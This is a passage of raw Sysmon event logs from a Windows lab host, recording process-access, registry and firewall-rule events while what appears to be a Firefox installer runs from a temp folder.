13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.458{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 534500x800000000000000016644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.411{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe 10341000x800000000000000016643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\System.dll+2965(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\System.dll+17cd(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\System.dll+2965(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\System.dll+17cd(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\System.dll+2965(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\System.dll+17cd(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\System.dll+2965(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\System.dll+17cd(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 13241300x800000000000000016639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:54.396{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x000005e0) 13241300x800000000000000016638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:54.396{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{16EEDFF0-8258-4DDA-ADAA-88B2AFC2E471}v2.26|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\Program Files\Mozilla Firefox\firefox.exe|Name=Firefox (C:\Program 
Files\Mozilla Firefox)| 10341000x800000000000000016637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.396{59A5CD1D-8E46-6005-1500-00000000A301}14921236C:\Windows\system32\svchost.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+dbc2|c:\windows\system32\mpssvc.dll+3014e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.396{59A5CD1D-8E46-6005-1500-00000000A301}14921236C:\Windows\system32\svchost.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+2fc35|c:\windows\system32\mpssvc.dll+2fb4e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000016635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:54.396{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x000005df) 13241300x800000000000000016634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:54.396{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{5BE8FC8E-BDDE-4FFE-A3FD-32223BC634E2}v2.26|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\Program Files\Mozilla Firefox\firefox.exe|Name=Firefox (C:\Program Files\Mozilla Firefox)| 10341000x800000000000000016633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.396{59A5CD1D-8E46-6005-1500-00000000A301}14921236C:\Windows\system32\svchost.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+dbc2|c:\windows\system32\mpssvc.dll+3014e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.396{59A5CD1D-8E46-6005-1500-00000000A301}14921236C:\Windows\system32\svchost.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+2fc35|c:\windows\system32\mpssvc.dll+2fb4e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000016631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:54.364{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\liteFirewallW.dll2021-01-18 13:59:54.364 12241200x800000000000000016630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-DeleteKey2021-01-18 13:59:54.349{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKU\S-1-5-21-2311372046-1276363322-545193238-500_Classes\*\shell\Firefox-308046B0AF4A39CB 10341000x800000000000000016629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
